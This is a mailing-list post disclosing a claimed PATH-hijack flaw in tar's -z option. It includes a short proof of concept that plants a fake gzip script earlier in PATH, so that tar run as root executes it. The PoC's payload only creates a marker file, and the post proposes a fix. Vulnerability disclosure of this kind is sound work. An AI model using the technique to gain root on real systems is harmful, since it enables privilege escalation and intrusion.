[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Path Hijack vulnerability
From: |
Gregorio Giacobbe |
Subject: |
Path Hijack vulnerability |
Date: |
Wed, 3 Nov 2021 15:21:43 +0100 |
Hi!
As per subject, I discovered a Path Hijack vulnerabilty in the tar binary. When
using the -z switch for gzip compression/decompression the binary calls “gzip”
without absolute path, hence allowing the path Hijack.
While this, in a normal scenario can be totally harmless, it can be used as a
privileged escalation technique when the tar binary is called as root user.
Following lines will provide a basic PoC:
----
export PATH=$(pwd):$PATH
echo -e '#!/bin/bash\ntouch /tmp/tarred' > gzip
chmod +x gzip
touch file.txt
tar -zcf backup.tar.gz file.txt
ls -la /tmp/tarred
-rw-r--r-- 1 root root 0 Nov 3 14:05 /tmp/tarred
----
I have not tested switches for other compression/decompression formats, so
there is a chance that they can be used as well as gzip.
The remediation would be to make sure that tar calls gzip by its absolute path.
Best Regards,
Gregorio Giacobbe
- Path Hijack vulnerability,
Gregorio Giacobbe <=